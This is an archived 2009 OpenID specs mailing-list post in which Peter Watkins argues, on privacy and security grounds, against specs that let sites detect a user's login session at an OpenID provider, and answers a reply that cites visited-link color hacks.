Discovery of an OpenID session at an OP

Peter Watkins peterw at tux.org
Mon Dec 14 21:36:30 UTC 2009 

On Mon, Dec 14, 2009 at 11:32:40AM -0800, John Panzer wrote:
> On Mon, Dec 14, 2009 at 11:21 AM, Peter Watkins <peterw at tux.org> wrote:

> > I
> > don't want the data-hungry folks at Facebook noticing that I'm logged
> > in to the Greenpeace or National Rifle Association unless I explicitly
> > approve letting Facebook know that.

> (Note that
> even today, you may be able to use visited-link color hacks to determine
> what OPs a user has recently frequented; statistically speaking you can
> already get the information you're worried about.)

I call that the "Grandfather Clause" Fallacy, and I see it pretty often.
Your argument is that because there's already an exposure (due to 
unintentional consequence of DOM/Javascript interaction), it's OK to build 
new systems & specs that are known to have the flaw from day one. You're 
arguing that the privacy flaw exhibited in the link status checking should 
be "grandfathered" in. 

Why not raise the bar, and make the web a *better* place instaed of settling 
for today's lowest common denominator?

> > 2) Security. A malicious site could more intelligently target victims
> > if it could ascertain what sites the victim is logged into. There's no
> > need to attempt some online Gmail exploit if the malicious RP can tell
> > that the victim isn't logged in to Google.

> Again, per above, I think this information is probably already available to
> evil.org, at least statistically speaking.

That visited-links privacy hack would tell you if I visited certain 
prominent pages like http://google.com, but that's quite different from 
telling the RP "Hey, Peter's logged in to Google right now, so this is
a perfect time to exploit him." I'm not a gmail user, but I expect that
most gmail URLs are pretty dynamic/ugly/unique, and it would be quite
expensive and unreliable to use visited link hackery to determine if an
individual had gotten past the gmail login page, to say nothhing about
whether the user is looged in *right now*.

BTW, for those of you who aren't familiar w/ the attack, here's an amusing
demo site: http://www.schillmania.com/random/humour/web20awareness/

And here's a Firefox bug ticket with a patch to disable special handling
of "visited" links, which is supposed to fix the problem.
https://bugzilla.mozilla.org/show_bug.cgi?id=147777

-Peter

More information about the specs mailing list